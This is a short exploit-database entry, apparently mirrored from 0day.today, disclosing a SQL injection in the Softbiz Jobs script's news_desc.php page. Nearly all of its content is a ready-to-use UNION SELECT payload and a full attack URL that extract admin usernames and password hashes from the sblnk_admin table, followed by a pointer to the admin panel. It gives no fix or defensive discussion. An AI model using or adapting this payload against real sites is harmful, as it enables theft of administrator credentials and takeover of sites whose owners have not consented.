id: 11020
date: 02/22/2010
title: Softbiz Jobs (news_desc) SQL Injection Vulnerability
author: BAYBORA
cves: 

=====================================================
Softbiz Jobs ( news_desc) SQL Injection Vulnerability
=====================================================

Softbiz Jobs ( news_desc) SQL Injection Vulnerability
 
###########################
Author    : Baybora
 
Homepage  : http://www.1923turk.com
 
Blog      : http://baybora.wordpress.com/
 
Script    : softbizscripts
 
Download  : http://www.softbizscripts.com/
 
###########################
   
Exploat  :news_desc.php?id=SQL
    
 
-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
   
   
   
http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
   
  
http://xxxx/admin



#  0day.today [2023-03-25]  #